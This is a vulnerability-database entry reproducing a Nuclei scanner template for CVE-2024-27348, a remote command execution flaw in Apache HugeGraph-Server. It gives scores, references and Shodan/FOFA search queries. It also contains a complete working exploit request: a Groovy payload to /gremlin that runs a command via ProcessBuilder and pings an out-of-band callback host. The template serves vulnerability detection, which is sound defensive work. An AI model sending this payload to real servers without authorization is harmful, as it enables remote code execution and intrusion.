Apache HugeGraph-Server - Remote Command Execution

2024-06-0218:33:37

ProjectDiscovery

github.com

103

cve2024

hugegraph

remote command execution

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

6.5

Confidence

Low

EPSS

0.963

Percentile

99.6%

JSON

Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.

id: CVE-2024-27348

info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.00045
    epss-percentile: 0.15047
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache

http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
# digest: 4a0a00473045022100aa9ae92d5900b75820e9ffcd29849fac5041ac03f2ae87c595cd533beb114ca002206bb3b4a4720b2ec86023bcbef0e2274fc1fb729953519ccad6dded1328e88770:922c64590222798bb761d5b6d8e72950